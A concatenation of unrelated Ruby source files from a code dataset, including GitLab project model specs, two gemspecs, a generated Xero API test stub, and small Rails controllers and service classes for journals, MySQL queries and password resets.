it 'returns current namespace' do
is_expected.to eq(parent)
end
end
end
describe '#write_repository_config' do
set(:project) { create(:project, :repository) }
it 'writes full path in .git/config when key is missing' do
project.write_repository_config
expect(project.repository.rugged.config['gitlab.fullpath']).to eq project.full_path
end
it 'updates full path in .git/config when key is present' do
project.write_repository_config(gl_full_path: 'old/path')
expect { project.write_repository_config }.to change { project.repository.rugged.config['gitlab.fullpath'] }.from('old/path').to(project.full_path)
end
it 'does not raise an error with an empty repository' do
project = create(:project_empty_repo)
expect { project.write_repository_config }.not_to raise_error
end
end
describe '#execute_hooks' do
it 'executes the projects hooks with the specified scope' do
hook1 = create(:project_hook, merge_requests_events: true, tag_push_events: false)
hook2 = create(:project_hook, merge_requests_events: false, tag_push_events: true)
project = create(:project, hooks: [hook1, hook2])
expect_any_instance_of(ProjectHook).to receive(:async_execute).once
project.execute_hooks({}, :tag_push_hooks)
end
it 'executes the system hooks with the specified scope' do
expect_any_instance_of(SystemHooksService).to receive(:execute_hooks).with({ data: 'data' }, :merge_request_hooks)
project = build(:project)
project.execute_hooks({ data: 'data' }, :merge_request_hooks)
end
it 'executes the system hooks when inside a transaction' do
allow_any_instance_of(WebHookService).to receive(:execute)
create(:system_hook, merge_requests_events: true)
project = build(:project)
# Ideally, we'd test that `WebHookWorker.jobs.size` increased by 1,
# but since the entire spec run takes place in a transaction, we never
# actually get to the `after_commit` hook that queues these jobs.
expect do
project.transaction do
project.execute_hooks({ data: 'data' }, :merge_request_hooks)
end
end.not_to raise_error # Sidekiq::Worker::EnqueueFromTransactionError
end
end
describe '#badges' do
let(:project_group) { create(:group) }
let(:project) { create(:project, path: 'avatar', namespace: project_group) }
before do
create_list(:project_badge, 2, project: project)
create(:group_badge, group: project_group)
end
it 'returns the project and the project group badges' do
create(:group_badge, group: create(:group))
expect(Badge.count).to eq 4
expect(project.badges.count).to eq 3
end
if Group.supports_nested_groups?
context 'with nested_groups' do
let(:parent_group) { create(:group) }
before do
create_list(:group_badge, 2, group: project_group)
project_group.update(parent: parent_group)
end
it 'returns the project and the project nested groups badges' do
expect(project.badges.count).to eq 5
end
end
end
end
context 'with cross project merge requests' do
let(:user) { create(:user) }
let(:target_project) { create(:project, :repository) }
let(:project) { fork_project(target_project, nil, repository: true) }
let!(:merge_request) do
create(
:merge_request,
target_project: target_project,
target_branch: 'target-branch',
source_project: project,
source_branch: 'awesome-feature-1',
allow_maintainer_to_push: true
)
end
before do
target_project.add_developer(user)
end
describe '#merge_requests_allowing_push_to_user' do
it 'returns open merge requests for which the user has developer access to the target project' do
expect(project.merge_requests_allowing_push_to_user(user)).to include(merge_request)
end
it 'does not include closed merge requests' do
merge_request.close
expect(project.merge_requests_allowing_push_to_user(user)).to be_empty
end
it 'does not include merge requests for guest users' do
guest = create(:user)
target_project.add_guest(guest)
expect(project.merge_requests_allowing_push_to_user(guest)).to be_empty
end
it 'does not include the merge request for other users' do
other_user = create(:user)
expect(project.merge_requests_allowing_push_to_user(other_user)).to be_empty
end
it 'is empty when no user is passed' do
expect(project.merge_requests_allowing_push_to_user(nil)).to be_empty
end
end
describe '#branch_allows_maintainer_push?' do
it 'allows access if the user can merge the merge request' do
expect(project.branch_allows_maintainer_push?(user, 'awesome-feature-1'))
.to be_truthy
end
it 'does not allow guest users access' do
guest = create(:user)
target_project.add_guest(guest)
expect(project.branch_allows_maintainer_push?(guest, 'awesome-feature-1'))
.to be_falsy
end
it 'does not allow access to branches for which the merge request was closed' do
create(:merge_request, :closed,
target_project: target_project,
target_branch: 'target-branch',
source_project: project,
source_branch: 'rejected-feature-1',
allow_maintainer_to_push: true)
expect(project.branch_allows_maintainer_push?(user, 'rejected-feature-1'))
.to be_falsy
end
it 'does not allow access if the user cannot merge the merge request' do
create(:protected_branch, :masters_can_push, project: target_project, name: 'target-branch')
expect(project.branch_allows_maintainer_push?(user, 'awesome-feature-1'))
.to be_falsy
end
it 'caches the result' do
control = ActiveRecord::QueryRecorder.new { project.branch_allows_maintainer_push?(user, 'awesome-feature-1') }
expect { 3.times { project.branch_allows_maintainer_push?(user, 'awesome-feature-1') } }
.not_to exceed_query_limit(control)
end
context 'when the requeststore is active', :request_store do
it 'only queries per project across instances' do
control = ActiveRecord::QueryRecorder.new { project.branch_allows_maintainer_push?(user, 'awesome-feature-1') }
expect { 2.times { described_class.find(project.id).branch_allows_maintainer_push?(user, 'awesome-feature-1') } }
.not_to exceed_query_limit(control).with_threshold(2)
end
end
end
end
describe "#pages_https_only?" do
subject { build(:project) }
context "when HTTPS pages are disabled" do
it { is_expected.not_to be_pages_https_only }
end
context "when HTTPS pages are enabled", :https_pages_enabled do
it { is_expected.to be_pages_https_only }
end
end
describe "#pages_https_only? validation", :https_pages_enabled do
subject(:project) do
# set-up dirty object:
create(:project, pages_https_only: false).tap do |p|
p.pages_https_only = true
end
end
context "when no domains are associated" do
it { is_expected.to be_valid }
end
context "when domains including keys and certificates are associated" do
before do
allow(project)
.to receive(:pages_domains)
.and_return([instance_double(PagesDomain, https?: true)])
end
it { is_expected.to be_valid }
end
context "when domains including no keys or certificates are associated" do
before do
allow(project)
.to receive(:pages_domains)
.and_return([instance_double(PagesDomain, https?: false)])
end
it { is_expected.not_to be_valid }
end
end
describe '#toggle_ci_cd_settings!' do
it 'toggles the value on #settings' do
project = create(:project, group_runners_enabled: false)
expect(project.group_runners_enabled).to be false
project.toggle_ci_cd_settings!(:group_runners_enabled)
expect(project.group_runners_enabled).to be true
end
end
describe '#gitlab_deploy_token' do
let(:project) { create(:project) }
subject { project.gitlab_deploy_token }
context 'when there is a gitlab deploy token associated' do
let!(:deploy_token) { create(:deploy_token, :gitlab_deploy_token, projects: [project]) }
it { is_expected.to eq(deploy_token) }
end
context 'when there is no a gitlab deploy token associated' do
it { is_expected.to be_nil }
end
context 'when there is a gitlab deploy token associated but is has been revoked' do
let!(:deploy_token) { create(:deploy_token, :gitlab_deploy_token, :revoked, projects: [project]) }
it { is_expected.to be_nil }
end
context 'when there is a gitlab deploy token associated but it is expired' do
let!(:deploy_token) { create(:deploy_token, :gitlab_deploy_token, :expired, projects: [project]) }
it { is_expected.to be_nil }
end
context 'when there is a deploy token associated with a different name' do
let!(:deploy_token) { create(:deploy_token, projects: [project]) }
it { is_expected.to be_nil }
end
context 'when there is a deploy token associated to a different project' do
let(:project_2) { create(:project) }
let!(:deploy_token) { create(:deploy_token, projects: [project_2]) }
it { is_expected.to be_nil }
end
end
context 'with uploads' do
it_behaves_like 'model with mounted uploader', true do
let(:model_object) { create(:project, :with_avatar) }
let(:upload_attribute) { :avatar }
let(:uploader_class) { AttachmentUploader }
end
end
end
| 31.140216 | 156 | 0.671038 |
5da339bacbecf527d40a10ab6a19586d98351433 | 773 | # encoding: utf-8
$:.push File.expand_path("../lib", __FILE__)
require 'hammerspace/version'
Gem::Specification.new do |s|
s.name = "hammerspace"
s.version = Hammerspace::VERSION
s.platform = Gem::Platform::RUBY
s.authors = `git log --format=%an -- lib`.split($/).uniq
s.email = `git log --format=%ae -- lib`.split($/).uniq.grep(/airbnb.com$/)
s.homepage = "https://github.com/airbnb/hammerspace"
s.summary = "Hash-like interface to persistent, concurrent, off-heap storage"
s.description = "A convenient place to store giant hammers"
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.require_path = 'lib'
s.add_runtime_dependency 'gnista', '~> 1.0.1'
end
| 35.136364 | 84 | 0.628719 |
616e7d1eb731c66f9605df01c4618de78401b628 | 1,307 | # coding: utf-8
lib = File.expand_path('../lib/', __FILE__)
$LOAD_PATH.unshift lib unless $LOAD_PATH.include?(lib)
require 'solidus_wishlist/version'
Gem::Specification.new do |s|
s.platform = Gem::Platform::RUBY
s.name = 'solidus_wishlist'
s.version = SolidusWishlist.version
s.summary = 'Add wishlists to Solidus'
s.description = s.summary
s.required_ruby_version = '>= 2.2.2'
s.author = 'John Dyer'
s.email = '[email protected]'
s.license = 'BSD-3'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.require_path = 'lib'
s.requirements << 'none'
s.add_runtime_dependency 'solidus_core', [">= 1.0.0", "< 3"]
s.add_development_dependency 'factory_bot'
s.add_development_dependency 'ffaker'
s.add_development_dependency 'rspec-rails'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'capybara'
s.add_development_dependency 'poltergeist'
s.add_development_dependency 'database_cleaner'
s.add_development_dependency 'simplecov'
s.add_development_dependency 'shoulda'
s.add_development_dependency 'coffee-rails'
s.add_development_dependency 'sass-rails'
s.add_development_dependency 'guard-rspec'
s.add_development_dependency 'byebug'
end
| 31.878049 | 62 | 0.717674 |
28bf0d9566ace1afce8167facbaca936c8c4827b | 1,428 | =begin
#Accounting API
#No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for XeroRuby::CISOrgSetting
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'CISOrgSetting' do
before do
# run before each test
@instance = XeroRuby::CISOrgSetting.new
end
after do
# run after each test
end
describe 'test an instance of CISOrgSetting' do
it 'should create an instance of CISOrgSetting' do
expect(@instance).to be_instance_of(XeroRuby::CISOrgSetting)
end
end
describe 'test attribute "cis_contractor_enabled"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "cis_sub_contractor_enabled"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "rate"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 26.444444 | 107 | 0.737395 |
b93c7de26b1ac2eb394f387b47ff74391c42779c | 162 | class PeerReaper
def self.reap_older_than(time = Peer::UPDATE_PERIOD_MINUTES.minutes.ago)
Peer.where('`peers`.`updated_at` < ?', time).destroy_all
end
end | 32.4 | 74 | 0.746914 |
ff7e548d832a7c01bcd6fbc18328f95dea6764ca | 299 | #Author: Piotr Wojcieszonek
#e-mail: [email protected]
# Copyright 23.03.2016 by Piotr Wojcieszonek
require_relative 'option'
require_relative 'type/raw'
module Lib
module DHCP
class Option202 < Option
#TODO Option202
include Lib::DHCP::Option::Type::Raw
end
end
end
| 16.611111 | 44 | 0.722408 |
bfa6f1fb1b18dfc53ef94126ae0b5975752a0b6d | 820 | # Utilities for:
#
# https://github.com/HakubJozak/sour
#
module Threescale
module Api
module Sour
module Operation
def paginated
param 'page',
description: 'Current page of the list',
dataType: 'int',
paramType: "path",
default: 1
param 'per_page',
description: 'Total number of records per one page (maximum 100)',
dataType: 'int',
default: 20
end
def param_system_name
param 'system_name', 'Human readable and unique identifier'
end
def requires_access_token
param 'access_token',
description: 'Your access token',
dataType: 'string',
required: true,
allowMultiple: false
end
end
end
end
end
| 22.162162 | 76 | 0.558537 |
288423faa5f3e5727dfa7b28d14eee5e6c3ae8f5 | 1,053 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
@other_user = users(:archer)
end
test "should redirect index when not logged in" do
get users_path
assert_redirected_to login_url
end
test "should get new" do
get signup_path
assert_response :success
end
test "should redirect destroy when not logged in" do
assert_no_difference 'User.count' do
delete user_path(@user)
end
assert_redirected_to login_url
end
test "should redirect destroy when logged in as a non-admin" do
log_in_as(@other_user)
assert_no_difference 'User.count' do
delete user_path(@user)
end
assert_redirected_to root_url
end
test "should redirect following when not logged in" do
get following_user_path(@user)
assert_redirected_to login_url
end
test "should redirect followers when not logged in" do
get followers_user_path(@user)
assert_redirected_to login_url
end
end
| 22.404255 | 66 | 0.710351 |
877c07d9f865a866f9c90f91048a6c1143c33d51 | 766 | class JournalsController < ApplicationController
before_action :authenticate_user!
def index
@journals = current_user.journals.page(params[:page])
end
def destroy
@journal = Journal.find(params[:id])
current_user.journals.delete(@journal)
redirect_to journals_path
end
def new
if params[:journal] && params[:journal][:name]
@journals = Serrano.journals(query: journal_params[:name])
end
@journal = Journal.new
end
def create
@journal = Journal.find_or_create_by(journal_params)
unless current_user.journals.include?(@journal)
current_user.journals << @journal
end
redirect_to journals_path
end
private
def journal_params
params.require(:journal).permit(:issn, :name)
end
end
| 21.277778 | 64 | 0.711488 |
b944e5d823dd180573726c23c7cd45fa48d87454 | 248 | module RiotGamesApi
module LOL
module Model
module Summoner
class RuneSlot
include Virtus.model
attribute :rune_id, Integer
attribute :rune_slot_id, Integer
end
end
end
end
end
| 16.533333 | 42 | 0.600806 |
5d9da7d84796ed640df33056a38a5eb23474089b | 3,892 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe Users::SetAttributesService, type: :model do
subject(:call) { instance.call(params) }
let(:current_user) { FactoryBot.build_stubbed(:user) }
let(:contract_instance) do
contract = double('contract_instance')
allow(contract)
.to receive(:validate)
.and_return(contract_valid)
allow(contract)
.to receive(:errors)
.and_return(contract_errors)
contract
end
let(:contract_errors) { double('contract_errors') }
let(:contract_valid) { true }
let(:model_valid) { true }
let(:instance) do
described_class.new(user: current_user,
model: model_instance,
contract_class: contract_class,
contract_options: {})
end
let(:model_instance) { User.new }
let(:contract_class) do
allow(Users::CreateContract)
.to receive(:new)
.and_return(contract_instance)
Users::CreateContract
end
let(:params) { {} }
before do
allow(model_instance)
.to receive(:valid?)
.and_return(model_valid)
end
context 'for a new record' do
let(:model_instance) do
User.new
end
it 'is successful' do
expect(call)
.to be_success
end
it 'returns the instance as the result' do
expect(call.result)
.to eql model_instance
end
it 'initalizes the notification settings' do
expect(call.result.notification_settings.length)
.to eql(3) # one for every channel
expect(call.result.notification_settings)
.to(all(be_a(NotificationSetting).and(be_new_record)))
end
context 'with params' do
let(:params) do
{
firstname: 'Foo',
lastname: 'Bar'
}
end
it 'assigns the params' do
call
expect(model_instance.firstname).to eq 'Foo'
expect(model_instance.lastname).to eq 'Bar'
end
end
context 'with attributes for the user`s preferences' do
let(:params) do
{
pref: {
auto_hide_popups: true
}
}
end
it 'initializes the user`s preferences with those attributes' do
expect(call.result.pref)
.to be_auto_hide_popups
end
end
end
context 'with an invalid contract' do
let(:contract_valid) { false }
let(:expect_time_instance_save) do
expect(model_instance)
.not_to receive(:save)
end
it 'returns failure' do
is_expected
.not_to be_success
end
it "returns the contract's errors" do
expect(call.errors)
.to eql(contract_errors)
end
end
end
| 26.47619 | 91 | 0.656989 |
d5f195cb89d219d10d5bd1a861586efc07e4ca1b | 448 | require 'opal'
require 'volt/models'
class Test
def self.test1
a = ReactiveValue.new(1)
listener = a.on('changed') { puts "CHANGED" }
a.cur = 5
listener.remove
ObjectTracker.process_queue
end
def self.test
a = ReactiveValue.new(Model.new)
a._cool = [1,2,3]
listener = a._cool.on('added') { puts "ADDED" }
a._cool << 4
puts a._cool[3]
listener.remove
ObjectTracker.process_queue
end
end
| 16.592593 | 51 | 0.631696 |
79613a37b2368c2abc6d6bdd85aa11f0c412843c | 1,307 | require File.expand_path("../../spec/dummy/config/environment.rb", __FILE__)
ActiveRecord::Migrator.migrations_paths = [File.expand_path("../../spec/dummy/db/migrate", __FILE__)]
ActiveRecord::Migrator.migrations_paths << File.expand_path('../../db/migrate', __FILE__)
require "rails/test_help"
require "rspec/rails"
# Filter out Minitest backtrace while allowing backtrace from other libraries
# to be shown.
Minitest.backtrace_filter = Minitest::BacktraceFilter.new
# Load fixtures from the engine
if ActiveSupport::TestCase.respond_to?(:fixture_path=)
ActiveSupport::TestCase.fixture_path = File.expand_path("../fixtures", __FILE__)
ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path
ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files"
ActiveSupport::TestCase.fixtures :all
end
Dir[ApartmentAcmeClient::Engine.root.join("spec", "apartment_acme_client", "stubs", "*.rb")].sort.each { |f| require f }
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 40.84375 | 120 | 0.772762 |
edeb9268635256b2b14be24189ed9ef06ccf7722 | 38 | module Basket
VERSION = "0.0.1"
end
| 9.5 | 19 | 0.657895 |
bfba319093432c924e6ab0c64c79c6dce0f210ec | 577 | module EasyTable
module Components
module Spans
def span(*args, &block)
opts = options_from_hash(args)
title, label = *args
child = node << Tree::TreeNode.new(title || generate_node_name)
span = Span.new(child, title, label, opts, @template, block)
child.content = span
end
private
def node
@node
end
def options_from_hash(args)
args.last.is_a?(Hash) ? args.pop : {}
end
def generate_node_name
"#{node.name}-span-#{node.size}"
end
end
end
end
| 20.607143 | 71 | 0.571924 |
e8f09c78014aa752b674209dea385e4c99e4102c | 3,944 | require 'meta_events/definition/version'
describe ::MetaEvents::Definition::Version do
let(:definition_set) do
out = double("definition_set")
allow(out).to receive(:kind_of?).with(::MetaEvents::Definition::DefinitionSet).and_return(true)
allow(out).to receive(:global_events_prefix).with().and_return("gep")
out
end
let(:klass) { ::MetaEvents::Definition::Version }
let(:instance) { klass.new(definition_set, 3, "2014-02-03") }
it "should require valid parameters for construction" do
expect { klass.new(double("not-a-definition-set"), 1, "2014-01-01") }.to raise_error(ArgumentError)
expect { klass.new(definition_set, "foo", "2014-01-01") }.to raise_error(ArgumentError)
expect { klass.new(definition_set, 1, nil) }.to raise_error
expect { klass.new(definition_set, 1, "2014-01-01", :foo => :bar) }.to raise_error(ArgumentError, /foo/i)
end
it "should return the definition set, number, and introduction time" do
expect(instance.definition_set).to be(definition_set)
expect(instance.number).to eq(3)
expect(instance.introduced).to eq(Time.parse("2014-02-03"))
end
it "should evaluate its block in its own context" do
expect_any_instance_of(klass).to receive(:foobar).once.with(:bonk)
klass.new(definition_set, 3, "2014-02-03") { foobar(:bonk) }
end
it "should return the prefix correctly" do
instance.prefix.should == "gep3_"
end
it "should set the property_separator to underscore by default" do
instance.property_separator.should == "_"
end
it "should allow setting the property separator to something else in the constructor" do
i2 = klass.new(definition_set, 3, "2014-02-03", :property_separator => 'Z')
i2.property_separator.should == "Z"
end
context "with one category" do
let(:category) do
out = double("category")
allow(out).to receive(:name).with().and_return(:quux)
out
end
it "should be able to create a new category, and retrieve it" do
blk = lambda { :whatever }
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, ' FooBar ', :bar => :baz) do |*args, &block|
expect(block).to eq(blk)
end.and_return(category)
instance.category(' FooBar ', :bar => :baz, &blk)
expect(instance.category_named(:quux)).to be(category)
end
it "should not allow creating duplicate categories" do
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :quux, { }).and_return(category)
instance.category(:quux)
category_2 = double("category-2")
allow(category_2).to receive(:name).with().and_return(:quux)
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :baz, { }).and_return(category_2)
expect { instance.category(:baz) }.to raise_error(ArgumentError, /baz/i)
end
it "should allow retrieving the category, and normalize the name" do
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :quux, { }).and_return(category)
instance.category(:quux)
instance.category_named(' QuuX ').should be(category)
end
it "should delegate to the category on #fetch_event" do
expect(::MetaEvents::Definition::Category).to receive(:new).once.with(instance, :quux, { }).and_return(category)
instance.category(:quux)
expect(category).to receive(:event_named).once.with(:foobar).and_return(:bonk)
instance.fetch_event(:quux, :foobar).should == :bonk
end
end
it "should return the #retired_at properly" do
expect(instance.retired_at).to be_nil
new_instance = klass.new(definition_set, 4, "2014-01-01", :retired_at => "2015-01-01")
expect(new_instance.retired_at).to eq(Time.parse("2015-01-01"))
end
it "should turn itself into a string reasonably" do
expect(instance.to_s).to match(/Version/)
expect(instance.to_s).to match(/3/)
end
end
| 39.44 | 130 | 0.692191 |
f8f4bd76f9842dcaa244ab8b52639b17073263af | 889 | class PhotoList
attr_reader :photos
def initialize(photos)
@photos = photos.sort_by { |photo| photo.added_at }.reverse
end
def with_tag(tag)
PhotoList.new(@photos.find_all { |photo| photo.tags.include?(tag) })
end
def with_collection(collection)
PhotoList.new(@photos.find_all { |photo| photo.collections.include?(collection) })
end
def find(uuid)
@photos.find { |photo| photo.uuid == uuid }
end
def item_before(item)
item_index = @photos.find_index(item)
if item_index > 0
@photos[item_index-1]
else
false
end
end
def item_after(item)
item_index = @photos.find_index(item)
@photos[item_index+1]
end
def page_number_for(item)
((@photos.index(item) + 1) / Paginatable::PER_PAGE.to_f).ceil
end
def slice(start, length)
photos.slice(start, length)
end
def size
photos.size
end
end
| 19.326087 | 86 | 0.670416 |
1cd80586ef06ac0a4e3c13cacd320c4e5f8d41f9 | 712 | module GoogleApps
class EventsList < Events
def events_list(optional_params={})
optional_params.reverse_merge!(:calendarId => 'primary', :maxResults => 1000)
# Events API is quick but, 2000+ events within a day might be a little absurd.
request :api => "calendar", :resource => "events", :method => "list", :params => optional_params,
:page_limiter => 2
end
def json_filename
page = @params[:params]['pageToken'].present? ? '_page2' : ''
"google_events_list_#{@params[:params][:maxResults]}#{page}.json"
end
def mock_request
super.merge(uri_matching: 'https://www.googleapis.com/calendar/v3/calendars/primary/events')
end
end
end
| 32.363636 | 103 | 0.657303 |
d5705587bcd0dd56168017c0899a75a4a3d3c2f3 | 665 | # frozen_string_literal: true
class MysqlQuery < ActiveInteraction::Base
object :data_source, class: DataSource
string :db_query
validates :db_query, :data_source, presence: true
def execute
ActiveRecord::Base.transaction do
username = data_source.settings.delete("user")
if data_source.settings["password"].present?
locker_id = data_source.settings.delete("password")
password = Locker.find(locker_id).enkrypted
else
password = ""
end
connection = Mysql2::Client.new(data_source.settings.merge({ username: username, password: password }))
connection.query(db_query).to_a
end
end
end
| 28.913043 | 109 | 0.705263 |
e8759791d74a5bd542db36e85d241225baeafc69 | 1,398 | class PasswordResetsController < ApplicationController
before_action :get_user, only: [:edit, :update]
before_action :valid_user, only: [:edit, :update]
before_action :check_expiration, only: [:edit, :update]
def new
end
def create
@user = User.find_by(email: params[:password_reset][:email].downcase)
if @user
@user.create_reset_digest
@user.send_password_reset_email
flash[:info] = "Email sent with password reset instructions"
redirect_to root_url
else
flash.now[:danger] = "Email address not found"
render "new"
end
end
def edit
end
def update
if params[:user][:password].empty?
@user.errors.add(:password, :blank)
render "edit"
elsif @user.update_attributes(user_params)
log_in @user
flash[:success] = "Password has been reset."
redirect_to @user
else
render "edit"
end
end
private
def user_params
params.require(:user).permit(:password, :password_confirmation)
end
def get_user
@user = User.find_by(email: params[:email])
end
def valid_user
unless (@user && @user.activated? && @user.authenticated?(:reset, params[:id]))
redirect_to root_url
end
end
def check_expiration
if @user.password_reset_expired?
flash[:danger] = "Password reset has expired"
redirect_to new_password_reset_url
end
end
end
| 22.918033 | 83 | 0.67382 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.